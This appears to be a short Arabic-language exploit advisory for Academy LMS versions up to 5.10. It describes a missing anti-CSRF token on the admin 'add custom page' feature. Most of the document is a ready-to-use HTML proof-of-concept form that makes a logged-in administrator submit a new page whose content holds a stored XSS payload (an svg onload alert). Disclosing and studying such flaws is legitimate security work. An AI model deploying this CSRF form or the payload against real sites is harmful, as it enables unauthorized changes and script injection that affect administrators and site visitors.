
Academy LMS <= 5.10 CSRF / XSS
Academy LMS <= 5.10 CSRF / XSS
Academy LMS هو تطبيق يمكن للأشخاص من خلاله إنشاء الدورات التدريبية والترويج لها. تكون ميزة إضافة صفحة جديدة عرضة لهجوم CSFR لعدم وجود رمز مميز يمنع هذا الهجوم. بالإضافة إلى ذلك، يمكن استخدام هذه الصفحة لتحميل حمولة XSS مخزنة.
الخطوة الأولى في إثبات المفهوم هي المصادقة على المنصة باستخدام مستخدم إداري.
بعد ذلك، فقط قم بالوصول إلى الصفحة التي تحتوي على كود استغلال الثغرة، ستلاحظ أنه سيتم إضافة زر جديد إلى الصفحة الرئيسية للموقع، يعيد التوجيه إلى صفحة XSS.
الكود المستخدم في الاستغلال:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<form action="https://target.com/admin/custom_page/add" method="POST">
<input type="hidden" name="page_title" value="CSRF XSS" />
<input type="hidden" name="page_content" value=""><svg onload=alert(document.domain);> ;" />
<input type="hidden" name="files" value="" />
<input type="hidden" name="button_title" value="CSRF XSS" />
<input type="hidden" name="button_position" value="header" />
<input type="hidden" name="page_url" value="xss" />
<input type="submit" value="Submit request" />
</form>
</body>
</html>